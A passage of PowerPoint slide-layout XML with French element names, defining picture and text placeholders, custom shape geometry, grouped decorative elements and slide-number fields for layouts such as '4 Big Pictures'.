              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804C5343-499B-4BF1-A833-E1D95D91F157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle : avec coin arrondi 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEACFE01-D4D4-4DB6-BC6D-CCD328BE55DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="370391" y="833377"/>
            <a:ext cx="11526418" cy="5347503"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3642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 name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FA6B15-855F-4994-BE5E-A1EB4E1F532B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4128228" cy="424732"/>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4" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5756114-49B7-46AD-A56A-13CACAA4A794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100138" y="2122488"/>
            <a:ext cx="9890125" cy="1384300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56AEA4-E95E-4B53-A965-6C20A29E2813}"/>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12" name="Groupe 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97AA0EC7-58B9-413D-A1C7-DDEEDA612AF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2AC2B0-96DA-44D5-A2A2-24E510B35909}"/>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7" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91862618-7244-4F17-B98B-E81E5CB97E69}"/>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18" name="Groupe 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A530A0A-0A08-4E09-9CD9-C518AC40B1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Groupe 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E000ED3D-49FD-4D31-AE70-2A5C470CC110}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4323E28D-4C1F-4606-843D-CD3ACE119F3A}"/>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3" name="Rectangle 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D278EDF-FBAD-4ED8-9F37-248EC169F5D2}"/>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20" name="Image 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55DDD7BD-5C61-4B05-B583-CE722BBEDE40}"/>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21" name="Image 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162F78FD-AA84-4E8A-A698-213B77B79A26}"/>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3102759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 Big Pictures">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Espace réservé pour une image  40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D7AD29-E8BE-4ACE-AF2B-D98ADCC5FC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1458413"/>
            <a:ext cx="6055358" cy="2351587"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6055358"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2351587"/>
              <a:gd name="connsiteX1" fmla="*/ 6055358 w 6055358"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2351587"/>
              <a:gd name="connsiteX2" fmla="*/ 6055358 w 6055358"/>
              <a:gd name="connsiteY2" fmla="*/ 2351587 h 2351587"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6055358"/>
              <a:gd name="connsiteY3" fmla="*/ 2351587 h 2351587"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6055358" h="2351587">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6055358" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055358" y="2351587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2351587"/>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6" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FB58295-9D50-49E8-A97E-AA8D2F48F8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"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0B76C5E4-5344-4E5F-BDA5-C8C0CD68AD88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75646A25-9A45-4E83-80EA-3DEBFDAE06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9" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E057F96-AA13-484F-A6D7-BD00A55CFA69}"/>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0" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB2AE01-44B5-487B-B4DD-88F8EF084AB2}"/>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43" name="Espace réservé pour une image  42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DFE71E-4FEB-4218-9DF5-BDB0C620FC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160792" y="1458413"/>
            <a:ext cx="6031209" cy="2351587"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6031209"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2351587"/>
              <a:gd name="connsiteX1" fmla="*/ 6031209 w 6031209"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2351587"/>
              <a:gd name="connsiteX2" fmla="*/ 6031209 w 6031209"/>
              <a:gd name="connsiteY2" fmla="*/ 2351587 h 2351587"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6031209"/>
              <a:gd name="connsiteY3" fmla="*/ 2351587 h 2351587"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6031209" h="2351587">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6031209" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6031209" y="2351587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2351587"/>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5" name="Espace réservé pour une image  44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A3E228-C8DB-4F32-8572-DAE5A4809773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="3922793"/>
            <a:ext cx="6055358" cy="2344601"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6055358"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2344601"/>
              <a:gd name="connsiteX1" fmla="*/ 6055358 w 6055358"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2344601"/>
              <a:gd name="connsiteX2" fmla="*/ 6055358 w 6055358"/>
              <a:gd name="connsiteY2" fmla="*/ 2344601 h 2344601"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6055358"/>
              <a:gd name="connsiteY3" fmla="*/ 2344601 h 2344601"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6055358" h="2344601">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6055358" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055358" y="2344601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="234460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7" name="Espace réservé pour une image  46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6975E0F1-285F-4BD6-98EB-DBD38616DE15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160792" y="3922793"/>
            <a:ext cx="6031209" cy="2344601"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6031209"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2344601"/>
              <a:gd name="connsiteX1" fmla="*/ 6031209 w 6031209"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2344601"/>
              <a:gd name="connsiteX2" fmla="*/ 6031209 w 6031209"/>
              <a:gd name="connsiteY2" fmla="*/ 585997 h 2344601"/>
              <a:gd name="connsiteX3" fmla="*/ 5995481 w 6031209"/>
              <a:gd name="connsiteY3" fmla="*/ 940408 h 2344601"/>
              <a:gd name="connsiteX4" fmla="*/ 4272594 w 6031209"/>
              <a:gd name="connsiteY4" fmla="*/ 2344601 h 2344601"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 6031209"/>
              <a:gd name="connsiteY5" fmla="*/ 2344601 h 2344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1209" h="2344601">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6031209" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6031209" y="585997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995481" y="940408"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5831496" y="1741779"/>
                  <a:pt x="5122444" y="2344601"/>
                  <a:pt x="4272594" y="2344601"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="234460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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Groupe 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5C8BE4-4C59-40EE-83B4-10F9780023EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E0587B-A1F5-4066-AC7F-270AA27359AB}"/>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2" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72590802-889B-4000-AA11-31C2196343EC}"/>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3" name="Groupe 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9F3633-B957-4B02-81DF-1DA3AB4B2488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC57571-A01A-41FA-AA4E-9223885BB641}"/>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5" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF081331-6C44-49E3-8752-2A2F8213958F}"/>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187741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4 Big Pictures (B)">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Espace réservé pour une image  56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8FB094-B185-4703-89EB-CF49BE70BC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449406" y="3911568"/>
            <a:ext cx="3904613" cy="2355826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3904613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 3904613 w 3904613"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 3904613 w 3904613"/>
              <a:gd name="connsiteY2" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3904613"/>
              <a:gd name="connsiteY3" fmla="*/ 2355826 h 2355826"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3904613" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3904613" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904613" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235582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5" name="Espace réservé pour une image  54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF97C46F-6B29-41F7-A0F0-90222B017889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3" y="1458414"/>
            <a:ext cx="4333651" cy="4808980"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY2" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY3" fmla="*/ 2355826 h 2355826"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4333651" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4333651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4333651" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235582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1" name="Espace réservé pour une image  50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6576C3BA-8C24-4A7A-ADC4-EEACA520F6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449405" y="1458414"/>
            <a:ext cx="3904616" cy="2345723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3904616"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX1" fmla="*/ 3904616 w 3904616"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX2" fmla="*/ 3904616 w 3904616"/>
              <a:gd name="connsiteY2" fmla="*/ 2345723 h 2345723"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3904616"/>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3904616" h="2345723">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3904616" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904616"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6" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FB58295-9D50-49E8-A97E-AA8D2F48F8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"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0B76C5E4-5344-4E5F-BDA5-C8C0CD68AD88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75646A25-9A45-4E83-80EA-3DEBFDAE06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9" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
